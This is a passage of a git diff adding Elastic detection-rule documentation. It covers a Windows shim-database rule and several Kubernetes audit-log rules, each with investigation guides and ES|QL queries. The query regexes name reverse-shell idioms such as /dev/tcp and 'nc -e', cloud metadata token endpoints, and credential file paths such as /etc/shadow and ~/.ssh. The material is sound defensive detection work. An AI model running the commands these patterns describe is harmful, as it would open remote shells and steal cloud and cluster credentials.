the query. +- Check the historical activity of the process responsible for the change to identify any patterns or anomalies that might indicate malicious behavior. +- Analyze the context around the time of the registry change, including other system events or alerts, to identify any related suspicious activities. +- If a suspicious .sdb file is found, conduct a file analysis to determine its purpose and whether it contains any malicious code or configurations. +- Consult threat intelligence sources to see if there are any known threats or campaigns associated with the identified process or .sdb file. + + +*False positive analysis* + + +- Known legitimate processes such as SAP and Kaspersky applications may trigger false positives due to their use of shim databases. These processes are already excluded in the detection rule to minimize unnecessary alerts. +- If additional legitimate applications are identified as causing false positives, users can update the exclusion list by adding the specific process executable paths to the rule. +- Regularly review and update the exclusion list to ensure it reflects the current environment and any new legitimate applications that may use shim databases. +- Monitor the frequency and context of alerts to distinguish between benign and potentially malicious activities, adjusting the rule as necessary to reduce noise. +- Engage with application owners to verify the legitimacy of processes that frequently trigger alerts, ensuring that only trusted applications are excluded. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further propagation or communication with potential command and control servers. +- Terminate any suspicious processes identified as responsible for the installation of the custom shim database, ensuring they are not legitimate processes mistakenly flagged. +- Remove the malicious shim database entries from the registry paths specified in the detection query to eliminate persistence mechanisms. +- Conduct a thorough scan of the affected system using updated antivirus and endpoint detection tools to identify and remove any additional malware or unauthorized changes. +- Review and restore any altered system configurations or files to their original state to ensure system integrity. +- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected. +- Implement enhanced monitoring and logging for the specified registry paths and associated processes to detect and respond to similar threats in the future. + +==== Setup + + + +*Setup* + + +This rule is designed for data generated by https://www.elastic.co/security/endpoint-security[Elastic Defend], which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules. + +Setup instructions: https://ela.st/install-elastic-defend + + +*Additional data sources* + + +This rule also supports the following third-party data sources. For setup instructions, refer to the links below: + +- https://ela.st/crowdstrike-integration[CrowdStrike] +- https://ela.st/m365-defender[Microsoft Defender XDR] +- https://ela.st/sentinel-one-cloud-funnel[SentinelOne Cloud Funnel] +- https://ela.st/sysmon-event-reg-setup[Sysmon Registry Events] + + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type == "change" and + registry.path : "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\\*.sdb" and + not process.executable : ( + "?:\\Program Files (x86)\\DesktopCentral_Agent\\*\\Setup\\NwSapSetup.exe", + "?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe", + "?:\\Program Files (x86)\\SAP\\SAPsetup\\setup\\NwSapSetup.exe", + "?:\\Program Files (x86)\\SAP\\SapSetup\\OnRebootSvc\\NWSAPSetupOnRebootInstSvc.exe", + "?:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Security for Windows Server\\kavfs.exe", + + /* Crowdstrike specific exclusion as it uses NT Object paths */ + "\\Device\\HarddiskVolume*\\Program Files (x86)\\DesktopCentral_Agent\\*\\Setup\\NwSapSetup.exe", + "\\Device\\HarddiskVolume*\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe", + "\\Device\\HarddiskVolume*\\Program Files (x86)\\SAP\\SAPsetup\\setup\\NwSapSetup.exe", + "\\Device\\HarddiskVolume*\\Program Files (x86)\\SAP\\SapSetup\\OnRebootSvc\\NWSAPSetupOnRebootInstSvc.exe", + "\\Device\\HarddiskVolume*\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Security for Windows Server\\kavfs.exe" + ) and + /* Microsoft Cloud AppCompat SDB test registrations */ + not registry.path : "*\\AppCompatFlags\\Custom\\*\\{22221111-1111-1111-1111-111111111111}.sdb" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Application Shimming +** ID: T1546.011 +** Reference URL: https://attack.mitre.org/techniques/T1546/011/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-pod-exec-cloud-instance-metadata-access.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-pod-exec-cloud-instance-metadata-access.asciidoc new file mode 100644 index 0000000000..524efc5001 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-pod-exec-cloud-instance-metadata-access.asciidoc @@ -0,0 +1,141 @@ +[[prebuilt-rule-8-19-32-kubernetes-pod-exec-cloud-instance-metadata-access]] +=== Kubernetes Pod Exec Cloud Instance Metadata Access + +Detects Kubernetes pod exec sessions whose decoded command line references cloud instance metadata endpoints or equivalent hostnames and paths. Workloads that reach the link-local metadata IP, AWS IMDS paths, GCP computeMetadata, Azure IMDS token routes, or encoded variants are often attempting to harvest role credentials, tokens, or instance attributes from the underlying node or hypervisor boundary. That behavior is high risk in multi-tenant and regulated environments because it can expose short-lived cloud credentials to code running inside a container. The rule classifies a coarse cloud target label and whether the string looks like credential retrieval versus lighter reconnaissance. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1552/005/ +* https://hardenedsecurity.io/blog/aws-imds-vulnerabilities-and-mitigations/ + +*Tags*: + +* Data Source: Kubernetes +* Data Source: Kubernetes API Server Audit Logs +* Domain: Kubernetes +* Platform: Kubernetes +* Domain: Cloud +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Execution +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Kubernetes Pod Exec Cloud Instance Metadata Access* + + +This alert fires when an audited exec requestURI, after URL decoding and command reconstruction, matches patterns +associated with instance metadata services across AWS, GCP, and Azure. Use it to catch interactive or scripted access +from inside a pod to metadata surfaces that should usually be blocked by network policy or not needed by application +code. + + +*Possible investigation steps* + + +- Confirm the Kubernetes identity that performed exec: user name, groups, impersonation, source IP, and user agent. +- Map the pod and namespace to a workload owner, image digest, and entrypoint; determine whether the container should + ever call metadata endpoints. +- Inspect Esql.cloud_target and Esql.is_credential_theft in the alert document and expand the timeline for the same + identity for secret reads, IAM changes, or data egress. +- Correlate with cloud audit logs on the node identity or instance profile for STS or token issuance around the event + time. + + +*False positive analysis* + + +- Break-glass debugging from platform engineers may include curl to 169.254.169.254; validate change tickets and + bastion use. +- Misconfigured agents or bootstrap scripts in bespoke images can touch metadata during startup; baseline approved + images and tune exclusions narrowly. + + +*Response and remediation* + + +- If unauthorized, terminate the session, isolate the workload, revoke or rotate instance and workload credentials that + could have been read, and tighten RBAC on pods exec plus network policies that deny link-local metadata from pods. + + +==== Rule query + + +[source, js] +---------------------------------- +FROM logs-kubernetes.audit_logs-* metadata _id, _index, _version +| WHERE kubernetes.audit.objectRef.subresource == "exec" + AND kubernetes.audit.requestURI LIKE "*command=*" +| EVAL Esql.decoded_uri = URL_DECODE(kubernetes.audit.requestURI) +| GROK Esql.decoded_uri "%{DATA}/exec\\?%{DATA:raw_commands}&(?:container|stdin|stdout|stderr)=%{GREEDYDATA}" +| EVAL command = REPLACE(raw_commands, "command=", "") +| EVAL command = REPLACE(command, "&", " ") +| EVAL Esql.executed_command = REPLACE(command, "\\+", " ") +| WHERE Esql.executed_command IS NOT NULL + AND Esql.executed_command RLIKE """.*(169\.254\.169\.254|2852039166|0xa9fea9fe|/latest/api/token|/latest/meta-data|/latest/user-data|/latest/dynamic/instance-identity|computeMetadata/v1|metadata\.google\.internal|metadata/identity/oauth2/token|metadata/instance).*""" +| EVAL Esql.cloud_target = CASE( + Esql.executed_command RLIKE """.*(169\.254\.169\.254|2852039166|0xa9fea9fe|/latest/meta-data|/latest/api/token|/latest/user-data|/latest/dynamic).*""", "AWS_IMDS", + Esql.executed_command RLIKE """.*(computeMetadata/v1|metadata\.google\.internal).*""", "GCP_METADATA", + Esql.executed_command RLIKE """.*metadata/identity/oauth2/token.*""", "AZURE_IMDS", + "UNKNOWN" + ) +| EVAL Esql.is_credential_theft = CASE( + Esql.executed_command RLIKE """.*(security-credentials|/api/token|oauth2/token|service-accounts/.*/token).*""", "yes", + "recon" + ) +| KEEP Esql.*, user.name, user_agent.original, event.*, source.ip, kubernetes.audit.*, _id, _version, _index, data_stream.namespace + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Cloud Instance Metadata API +** ID: T1552.005 +** Reference URL: https://attack.mitre.org/techniques/T1552/005/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Container Administration Command +** ID: T1609 +** Reference URL: https://attack.mitre.org/techniques/T1609/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-pod-exec-potential-reverse-shell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-pod-exec-potential-reverse-shell.asciidoc new file mode 100644 index 0000000000..f174eccc6c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-pod-exec-potential-reverse-shell.asciidoc @@ -0,0 +1,122 @@ +[[prebuilt-rule-8-19-32-kubernetes-pod-exec-potential-reverse-shell]] +=== Kubernetes Pod Exec Potential Reverse Shell + +Flags exec into a pod when the URL-decoded command payload resembles reverse-shell or bind-shell one-liners invocation patterns. Legitimate debug sessions sometimes use similar building blocks, but together these patterns align with post-exploitation interactive access and command-and-control. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1609/ +* https://attack.mitre.org/techniques/T1059/ + +*Tags*: + +* Data Source: Kubernetes +* Data Source: Kubernetes API Server Audit Logs +* Domain: Kubernetes +* Platform: Kubernetes +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Command and Control +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Kubernetes Pod Exec Potential Reverse Shell* + + +The rule inspects Kubernetes audit exec requestURI values, URL-decodes them, parses the command query fragment, and +matches high-signal shell and socket idioms often used to obtain a fallback shell from inside a container. + + +*Possible investigation steps* + + +- Identify the actor (kubernetes.audit.user.username, groups, impersonation), source IP, and user agent + (human kubectl vs automation). +- Resolve the target namespace, pod, and container from kubernetes.audit.objectRef.* and correlate with + workload ownership and change tickets. +- Pull the raw and decoded URI from the alert document and replay the inferred command in a sandbox only if policy + allows—otherwise rely on audit and platform logs. +- Hunt nearby events from the same identity: secret reads, pods/exec to other workloads, RoleBinding + changes, or anonymous API use. + + +*False positive analysis* + + +- Security training, CTF-style images, or vendor diagnostics may include bash redirection or /dev/tcp examples; + baseline approved images and break-glass accounts. +- Some observability or mesh sidecars use socat or sockets in ways that could overlap; validate container image and + command lineage. + + +*Response and remediation* + + +- If malicious, terminate the exec session, isolate the workload or node, rotate credentials reachable from the + pod, and revoke pods/exec for the abused principal unless strictly required. + + +==== Rule query + + +[source, js] +---------------------------------- +FROM logs-kubernetes.audit_logs-* metadata _id, _index, _version +| WHERE kubernetes.audit.objectRef.subresource == "exec" + AND kubernetes.audit.requestURI LIKE "*command=*" +| EVAL Esql.decoded_uri = URL_DECODE(kubernetes.audit.requestURI) +| GROK Esql.decoded_uri "%{DATA}/exec\\?%{DATA:raw_commands}&(?:container|stdin|stdout|stderr)=%{GREEDYDATA}" +| EVAL command = REPLACE(raw_commands, "command=", "") +| EVAL command = REPLACE(command, "&", " ") +| EVAL Esql.executed_command = REPLACE(command, "\\+", " ") +| WHERE Esql.executed_command IS NOT NULL AND command RLIKE """.*(/dev/tcp/|/dev/udp/|zsh/net/tcp|zsh/net/udp|nc\s+-e|ncat\s+-e|netcat\s+-e|nc\s.*\s-c\s|mkfifo|socat\s.*exec|socat\s.*pty|bash\s+-i\s+>&|0>&1|>&\s*/dev/tcp|import\s+socket.*connect|import\s+pty.*spawn|socket\.socket.*connect|IO::Socket::INET|fsockopen|TCPSocket\.new|/inet/tcp/).*""" AND + // local service health check patterns + NOT command RLIKE """.*/dev/tcp/(localhost|127\.0\.0\.1)/(8080|8443|9090|3000|5000|8888|80|443).*""" +| KEEP Esql.*, user.name, user_agent.original, event.*, source.ip, kubernetes.audit.*, _id, _version, _index, data_stream.namespace + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Container Administration Command +** ID: T1609 +** Reference URL: https://attack.mitre.org/techniques/T1609/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-pod-exec-sensitive-file-or-credential-path-access.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-pod-exec-sensitive-file-or-credential-path-access.asciidoc new file mode 100644 index 0000000000..c8d1b30046 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-pod-exec-sensitive-file-or-credential-path-access.asciidoc @@ -0,0 +1,151 @@ +[[prebuilt-rule-8-19-32-kubernetes-pod-exec-sensitive-file-or-credential-path-access]] +=== Kubernetes Pod Exec Sensitive File or Credential Path Access + +Detects Kubernetes pod exec sessions whose decoded command line references high-value host or in-cluster paths and material types: mounted service account or platform tokens, kubelet and control-plane configuration areas, host identity stores, root dot-directories for cloud and kubeconfig material, common private-key and keystore extensions, process environment dumps, and configuration filenames suggestive of embedded secrets. The intent is to catch interactive or scripted access that often precedes lateral movement, privilege escalation, or credential theft from the node or workload boundary. A narrow exclusion ignores benign reads of resolv.conf. The query also labels an access_type bucket to speed triage without altering the detection predicates you validated. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1552/001/ +* https://attack.mitre.org/techniques/T1552/007/ + +*Tags*: + +* Data Source: Kubernetes +* Data Source: Kubernetes API Server Audit Logs +* Domain: Kubernetes +* Platform: Kubernetes +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Execution +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Kubernetes Pod Exec Sensitive File or Credential Path Access* + + +This alert ties Kubernetes audit exec events to reconstructed command text that matches sensitive path and filename +patterns. Use the Esql.access_type field to prioritize: IRSA token paths, default Kubernetes service account tokens, +other mounted secrets, certificates and keystores, Kubernetes static config, kubelet state, host passwd or shadow, +user home credential stores, and proc environ scraping. + + +*Possible investigation steps* + + +- Identify the Kubernetes user, groups, impersonation, source IP, and user agent for the exec caller. +- Map objectRef namespace, pod, and container to an owning team, image digest, and change history. +- Compare Esql.executed_command against known runbooks; capture follow-on audit activity such as additional execs, + secret reads at the API layer, or RBAC changes. +- If host-level paths appear, determine whether the workload runs privileged, with hostPath mounts, or on nodes where + break-glass access is expected. + + +*False positive analysis* + + +- Diagnostic images and vendor agents sometimes cat resolv.conf or kubeconfig-like paths; the rule excludes resolv.conf + but other matches may still be legitimate—baseline stable automation identities. +- Training containers that deliberately demonstrate passwd reads can trigger; scope exceptions to those images and + namespaces. + + +*Response and remediation* + + +- If malicious, end the exec session, isolate the pod or node, rotate any credentials that could have been read, + review and tighten pods exec RBAC and admission controls, and inspect for persistence added after the session. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-kubernetes.audit_logs-* metadata _id, _index, _version +| WHERE kubernetes.audit.objectRef.subresource == "exec" + AND kubernetes.audit.requestURI LIKE "*command=*" +| EVAL Esql.decoded_uri = URL_DECODE(kubernetes.audit.requestURI) +| GROK Esql.decoded_uri "%{DATA}/exec\\?%{DATA:raw_commands}&(?:container|stdin|stdout|stderr)=%{GREEDYDATA}" +| EVAL command = REPLACE(raw_commands, "command=", "") +| EVAL command = REPLACE(command, "&", " ") +| EVAL Esql.executed_command = REPLACE(command, "\\+", " ") +| WHERE Esql.executed_command IS NOT NULL + AND Esql.executed_command RLIKE """.*(/var/run/secrets/|/etc/kubernetes/|/var/lib/kubelet/|/etc/shadow|/etc/passwd|/etc/sudoers|(/root|/home/[^/]+)/\.(ssh|aws|azure|kube|config/gcloud)|\.p12|\.pem|\.key|\.jks|\.keystore|/etc/.*\.conf.*(password|secret|key|token|credential)|/proc/.*/environ).*""" + AND NOT Esql.executed_command RLIKE """.*/etc/resolv\.conf.*""" +| EVAL Esql.access_type = CASE( + Esql.executed_command RLIKE """.*/var/run/secrets/eks\.amazonaws\.com.*""", "AWS_IRSA_TOKEN", + Esql.executed_command RLIKE """.*/var/run/secrets/azure/tokens/.*""", "AZURE_WORKLOAD_IDENTITY_TOKEN", + Esql.executed_command RLIKE """.*/var/run/secrets/tokens/gcp-ksa/.*""", "GCP_WORKLOAD_IDENTITY_TOKEN", + Esql.executed_command RLIKE """.*/var/run/secrets/kubernetes\.io/serviceaccount/token.*""", "K8S_SA_TOKEN", + Esql.executed_command RLIKE """.*/var/run/secrets/.*""", "MOUNTED_SECRET", + Esql.executed_command RLIKE """.*\.(p12|pem|key|jks|keystore).*""", "CERTIFICATE_OR_KEY", + Esql.executed_command RLIKE """.*/etc/kubernetes/.*""", "K8S_CONFIG", + Esql.executed_command RLIKE """.*/var/lib/kubelet/.*""", "KUBELET_CONFIG", + Esql.executed_command RLIKE """.*/etc/shadow.*""", "HOST_CREDENTIALS", + Esql.executed_command RLIKE """.*/etc/passwd.*""", "USER_ENUMERATION", + Esql.executed_command RLIKE """.*/etc/sudoers.*""", "SUDOERS_ACCESS", + Esql.executed_command RLIKE """.*(/root|/home/[^/]+)/\.(ssh|aws|azure|kube|config/gcloud).*""", "USER_CREDENTIALS", + Esql.executed_command RLIKE """.*/proc/.*/environ.*""", "PROCESS_ENV_SECRETS", + Esql.executed_command RLIKE """.*/etc/.*\.conf.*(password|secret|key|token|credential).*""", "EMBEDDED_CONFIG_SECRET", + "OTHER_SENSITIVE" + ) +| KEEP Esql.*, user.name, user_agent.original, event.*, source.ip, kubernetes.audit.*, _id, _version, _index, data_stream.namespace + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Credentials In Files +** ID: T1552.001 +** Reference URL: https://attack.mitre.org/techniques/T1552/001/ +* Sub-technique: +** Name: Container API +** ID: T1552.007 +** Reference URL: https://attack.mitre.org/techniques/T1552/007/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Container Administration Command +** ID: T1609 +** Reference URL: https://attack.mitre.org/techniques/T1609/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-pod-exec-with-curl-or-wget-to-https.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-pod-exec-with-curl-or-wget-to-https.asciidoc new file mode 100644 index 0000000000..0fbc2087a5 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-pod-exec-with-curl-or-wget-to-https.asciidoc @@ -0,0 +1,127 @@ +[[prebuilt-rule-8-19-32-kubernetes-pod-exec-with-curl-or-wget-to-https]] +=== Kubernetes Pod Exec with Curl or Wget to HTTPS + +Detects pod or attach exec API calls where the decoded request query implies curl or wget fetching an https URL. Attackers with permission to exec into workloads often run one-liners to stage tooling, pull scripts or binaries, or exfiltrate data over HTTPS—activity that should be rare compared to shells, debuggers, or expected health checks. The rule decodes the audit requestURI, reconstructs a readable command string from repeated command parameters, and applies noise filters for common cluster health and OIDC/JWKS endpoints so benign automation is less likely to alert. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1609/ +* https://attack.mitre.org/techniques/T1105/ + +*Tags*: + +* Data Source: Kubernetes +* Data Source: Kubernetes API Server Audit Logs +* Domain: Kubernetes +* Platform: Kubernetes +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Command and Control +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Kubernetes Pod Exec with Curl or Wget to HTTPS* + + +Kubernetes audit logs record exec (and similar attach) calls on requestURI, including URL-encoded +command segments. This rule URL-decodes the URI, extracts the query portion into a single string, and +flags curl or wget combined with https, excluding several common health, localhost, and OIDC/JWKS patterns. + + +*Possible investigation steps* + + +- Confirm who may exec into the target namespace: review kubernetes.audit.user.username, groups, impersonation, and + source.ip / user_agent.original (kubectl, CI, webhooks). +- Map the pod (kubernetes.audit.objectRef.name) and workload owner; retrieve the decoded URI from + Esql.decoded_uri and the reconstructed Esql.executed_command in the alert. +- Search for adjacent audit events from the same identity: secret reads, additional execs, RBAC changes, or anonymous + access. +- If malicious, revoke credentials used for exec, review RoleBindings for **`pods/exec`**, and inspect the pod + filesystem or snapshot for dropped artifacts. + + +*False positive analysis* + + +- Approved runbooks or support sessions may use kubectl exec with curl/wget to test egress or download vendor tools; + document break-glass identities and tune exclusions. +- Some cluster components use HTTPS to **kubernetes.default.svc** or **.well-known** endpoints; the rule attempts to + filter those—expand the exclusion list if your platform uses additional first-party URLs. + + +*Response and remediation* + + +- Rotate any secrets accessible from the pod, cordon or delete the workload if compromised, and tighten RBAC so only + required principals retain **`pods/exec`** on sensitive namespaces. + + +==== Rule query + + +[source, js] +---------------------------------- +FROM logs-kubernetes.audit_logs-* metadata _id, _index, _version +| WHERE kubernetes.audit.objectRef.subresource == "exec" + AND kubernetes.audit.requestURI LIKE "*command=*" +| EVAL Esql.decoded_uri = URL_DECODE(kubernetes.audit.requestURI) +| GROK Esql.decoded_uri "%{DATA}/exec\\?%{DATA:raw_commands}&(?:container|stdin|stdout|stderr)=%{GREEDYDATA}" +| EVAL command = REPLACE(raw_commands, "command=", "") +| EVAL command = REPLACE(command, "&", " ") +| EVAL Esql.executed_command = REPLACE(command, "\\+", " ") +| WHERE Esql.executed_command IS NOT NULL + AND Esql.executed_command RLIKE """.*(curl.*https|wget.*https).*""" + AND NOT Esql.executed_command RLIKE """.*(/api/v1/health|/healthz|/readyz|/livez|127\.0\.0\.1|localhost|/openid/v1/jwks|/openid-connect/certs|/.well-known/openid-configuration|/.well-known/jwks\.json|kubernetes\.default\.svc).*""" +| KEEP Esql.*, user.name, user_agent.original, event.*, source.ip, kubernetes.audit.*, _id, _version, _index, data_stream.namespace + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Container Administration Command +** ID: T1609 +** Reference URL: https://attack.mitre.org/techniques/T1609/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Ingress Tool Transfer +** ID: T1105 +** Reference URL: https://attack.mitre.org/techniques/T1105/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-secret-get-or-list-from-node-or-pod-service-account.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-secret-get-or-list-from-node-or-pod-service-account.asciidoc new file mode 100644 index 0000000000..6c5479d6e8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-secret-get-or-list-from-node-or-pod-service-account.asciidoc @@ -0,0 +1,130 @@ +[[prebuilt-rule-8-19-32-kubernetes-secret-get-or-list-from-node-or-pod-service-account]] +=== Kubernetes Secret Get or List from Node or Pod Service Account + +Kubernetes audit identities for kubelet (system:node:*) and workloads (system:serviceaccount:*) are meant to operate with tight, predictable API usage. Direct get or list on the Secrets API from those principals is often a sign of credential access. Attackers who stole a pod service-account token or node credentials sweep Secret objects for tokens, registry credentials, TLS keys, or application configuration. Even denied attempts still reveal intent to reach sensitive material. Legitimate controllers do read secrets they mount or manage, so this signal is most valuable when paired with triage (namespace scope, user agent, RBAC, and whether the identity should touch those secret names at all). + +*Rule type*: query + +*Rule indices*: + +* logs-kubernetes.audit_logs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: None ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1552/007/ +* https://kubernetes.io/docs/reference/access-authn-authz/authentication/#service-account-tokens + +*Tags*: + +* Data Source: Kubernetes +* Data Source: Kubernetes API Server Audit Logs +* Domain: Kubernetes +* Platform: Kubernetes +* Use Case: Threat Detection +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Kubernetes Secret Get or List from Node or Pod Service Account* + + +This rule fires on Kubernetes audit events where the authenticated user is a node (`system:node:`) or a +pod service account (`system:serviceaccount::`) and the verb maps to read-style access +(`get`, `list`) on the **secrets** resource. Treat node-originated secret reads as high priority: kubelet should +not broadly enumerate cluster secrets. For service accounts, prioritize cross-namespace access, access to +high-value secret names, and clients that do not match the workload’s normal user agent or deployment. + + +*Possible investigation steps* + + +- Resolve `user.name` (or `kubernetes.audit.user.username` if present) to the node or workload and review RBAC + RoleBindings and ClusterRoleBindings for secret `get`/`list` scope. +- Inspect `kubernetes.audit.objectRef.namespace`, `kubernetes.audit.objectRef.name`, source IP, and + `user_agent.original` for automation you recognize versus anomalous scripts or generic HTTP clients. +- Review `kubernetes.audit.annotations.authorization_k8s_io/decision` for successful reads versus probing denials. +- Correlate with pod exec, token creation, RoleBinding changes, or secret modification in the same time window. + + +*False positive analysis* + + +- Controllers that reconcile Secrets (e.g. cert-manager, external-secrets, sealed-secrets) may match; allowlist their + service accounts if behavior is expected and scoped. +- Helm and package managers can list release secrets during deploys; correlate with pipelines and chart releases. + + +*Response and remediation* + + +- If malicious, revoke the token or node credentials, cordon or isolate the host or workload, rotate exposed secrets, and + tighten RBAC to least privilege for the affected identity. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset:"kubernetes.audit_logs" and +event.action:(get or list) and +kubernetes.audit.objectRef.resource:"secrets" and +user.name:(system\:serviceaccount\:* or system\:node\:*) and source.ip:(* and not "127.0.0.1") and +not kubernetes.audit.user.groups:( + "system:serviceaccounts:flux-system" + or "system:serviceaccounts:kyverno" + or "system:serviceaccounts:ibm-csi" + or "system:serviceaccounts:harvester-system" + or "system:serviceaccounts:cattle-system" + or "system:serviceaccounts:cattle-monitoring-system" + or system\:serviceaccounts\:cluster-fleet-local-local-* + or "system:serviceaccounts:rabbitmq-system" + or "system:serviceaccounts:cattle-fleet-system" +) and +not (kubernetes.audit.user.username:"system:serviceaccount:security:trivy-operator" and kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name :trivy-operator-*) and +not (kubernetes.audit.user.username:"system:serviceaccount:cert-manager:cert-manager-cainjector" and kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name:cert-manager-cainjector-*) and +not (kubernetes.audit.user.username:"system:serviceaccount:monitoring:plat-central-monitoring-pr-operator" and kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name:plat-central-monitoring-pr-operator*) and +not (kubernetes.audit.user.username:"system:serviceaccount:cert-manager:cert-manager" and kubernetes.audit.user.extra.authentication.kubernetes.io/pod-name:cert-manager-*) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Container API +** ID: T1552.007 +** Reference URL: https://attack.mitre.org/techniques/T1552/007/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-secret-get-or-list-with-suspicious-user-agent.asciidoc 